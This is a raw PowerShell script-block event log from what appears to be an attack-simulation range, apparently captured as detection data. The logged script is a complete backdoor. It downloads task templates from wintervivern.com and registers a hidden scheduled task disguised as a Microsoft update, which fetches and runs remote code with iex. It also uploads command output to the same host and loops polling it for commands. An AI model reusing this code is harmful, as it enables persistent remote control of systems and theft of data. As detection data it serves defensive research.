4104152150x0125231Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-295.attackrange.local11$uname = whoami; $singleHost = 'https://wintervivern.com/' $xmlUri ="'" + "https://wintervivern.com/userfolders/1.php"+ ";"; $n = '$g' function regSchTask{ $userId=get-wmiobject -class win32_useraccount | ? {$_.caption -eq $uname } |%{$_.sid}; $s = (New-Object Net.Webclient).DownloadString($singleHost+"1111.xml"); $s = $s.replace('<author>$name</author>', "<author>$uname</author>"); $s = $s.replace('<userid>$userId</userid>',"<userid>$userId</userid>"); $s = $s.replace('<arguments></arguments>',"<arguments> -w hidden -c `"$n=New-Object Net.Webclient;$n.credentials=[net.credentialcache]::DefaultNetworkCredentials;iex $n.DownloadString($xmlUri)`"</arguments>"); $s |out-file $enc:appdata/XmlSchemaMicrosoftXsd.xml; schtasks /create /xml "$env:appdata/XmlSchemaMicrosoftXsd.xml" /tn "Client_Update_Microsoft-{ITCUNTH-9D12-4RE18BWD-6HFI2D4FNI1T2}" remove-item $env:appdata/XmlSchemaMicrosoftXsd.xml } function regSchTask0{ $userId=get-wmiobject -class win32_useraccount | ? {$_.caption -eq $uname } |%{$_.sid}; $s = (New-Object Net.Webclient).DownloadString($singleHost+"2222.xml"); $s = $s.replace('<author>$name</author>', "<author>$uname</author>"); $s = $s.replace('<userid>$userId</userid>',"<userid>$userId</userid>"); $s = $s.replace('<arguments></arguments>',"<arguments> -w hidden -c `"$n=New-Object Net.Webclient;$n.credentials=[net.credentialcache]::DefaultNetworkCredentials;iex $n.DownloadString($xmlUri)`"</arguments>"); $s | out-file $enc:appdata/XmlSchemaMicrosoftXsd.xml; schtasks /create /xml "$env:appdata/XmlSchemaMicrosoftXsd.xml" /tn "Client_Update_Microsoft-{ITCUNTH-9D12-4RE18BWD-6HFI2D4FNI1T2}" } function sendData($message){ try{ if ($message -ne $null) { (New-Object Net.Webclient).UploadString($singleHost + "senddata.php",($message -join "`r`n")) } } catch{($Error[0])} } function starter{ $message = try{ $com=(New-Object Net.Webclient).DownloadString("singleHost" + "starter/php"); if($com.Lenght -ge 1) { iex $com } } catch{($Error[0])}; sendData($message); sleep 10; starter } $runnable = try {schtasks | ? {$_ -like "*9D36*"}}catch{}; $os = ([system.environment]::osversion).version.major; if($runnable -eq $null){ if($os -le 6){regSchTask0| out-null;} else{regSchTask0| out-null;} starter|out-null } else{ starter|out-null }051abddb-570b-4c85-8ace-8fea1c1c91faC:\Temp\1.ps1 410515102150x0125230Microsoft-Windows-PowerShell/Operationalwin-dc-ctus-attack-range-295.attackrange.local9319434b-53cb-4bd4-b6cf-16a87bae9b4b48b9b13e-0a16-4011-8b04-c278bc1a4547